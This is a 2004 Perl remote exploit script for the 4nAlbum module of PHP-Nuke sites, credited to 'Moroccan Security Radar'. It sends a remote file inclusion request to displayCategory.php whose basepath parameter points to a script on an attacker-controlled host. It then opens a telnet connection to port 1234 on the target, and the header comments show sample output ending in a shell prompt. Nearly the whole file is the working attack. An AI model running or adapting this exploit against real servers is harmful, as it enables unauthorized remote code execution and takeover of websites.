#!/usr/bin/perl -w
#
#-bash-2.05b$ perl 4nalb.pl -t 192.168.1.10 -d nuke
#Usage: perl 4nalb.pl -t <target> -d <directory>
#Remote Exploit 4nAlbum by adil@ccc.ma & alaa_eddine83@hotmail.com
#############################
# Moroccan Security Radar
# CCC MAROC 2004
#############################
#Target: 192.168.1.10
#Directory: nuke
#++++++++++++++++++++++++++++++++++++++++++++++++
#Vuln - Vuln - 3 - 2 - 1 ------
#connected
#Trying 192.168.1.10...
#Connected to 192.168.1.10.
#Escape character is '^]'.
#sh-2.05b$
require LWP::UserAgent;
use Getopt::Std;
getopts('t:d:');
our($opt_t, $opt_d);
my $target = $opt_t;
my $dir = $opt_d;
print "Usage: perl 4nalb.pl -t <target> -d <directory>\n\n";
print "Remote Exploit 4nAlbum by adil At ccc.ma & alaa_eddine83 At hotmail.com\n";
print "#############################\n";
print " Moroccan Security Radar\n";
print " CCC MAROC 2004 \n";
print "#############################\n";
print "Target: $target\n";
print "Directory: $dir\n";
my $ua = LWP::UserAgent->new;
$ua->agent("Linux");
$ua->timeout(10);
$ua->env_proxy;
$req = "http://$target/$dir/modules/4nAlbum/public/displayCategory.php?basepath=http://www.attaker.com/inject.txt?&cmd=";
my $response = $ua->get($req);
print "++++++++++++++++++++++++++++++++++++++++++++++++\n";
if ($response->is_success) {
print "Vuln - Vuln - 3 - 2 - 1 ------\n";
print "connected\n";
sleep(3);
exec("telnet $target 1234");
} else {
die $response->status_line;
}
print "++++++++++++++++++++++++++++++++++++++++++++++++++\n";
# EOF
推荐
评论(0条)
